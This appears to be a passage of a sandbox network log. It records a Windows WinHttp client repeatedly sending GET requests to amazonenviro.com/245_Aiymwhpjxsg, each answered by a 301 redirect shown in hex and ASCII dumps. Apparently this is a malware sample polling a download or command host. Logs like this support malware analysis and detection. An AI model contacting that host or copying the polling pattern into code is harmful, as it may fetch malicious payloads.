                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:06.911449909 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:07.222122908 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:07 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:08.835870981 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:09.146507978 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:08 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:10.752278090 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:11.062268019 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:10 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:12.729248047 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:13.039334059 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:12 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:14.698240042 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:15.008749008 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:14 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:16.684869051 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:16.995081902 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:16 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:18.587634087 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:18.898366928 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:18 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:20.549110889 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:20.859464884 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:20 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:22.496917009 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:22.807887077 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:22 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:24.433629036 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:24.744117022 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:24 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:26.360616922 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:26.671545982 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:26 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:28.279562950 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:28.590183973 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:28 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:30.223527908 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:30.536135912 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:30 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:32.234637022 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:32.554723978 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:32 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
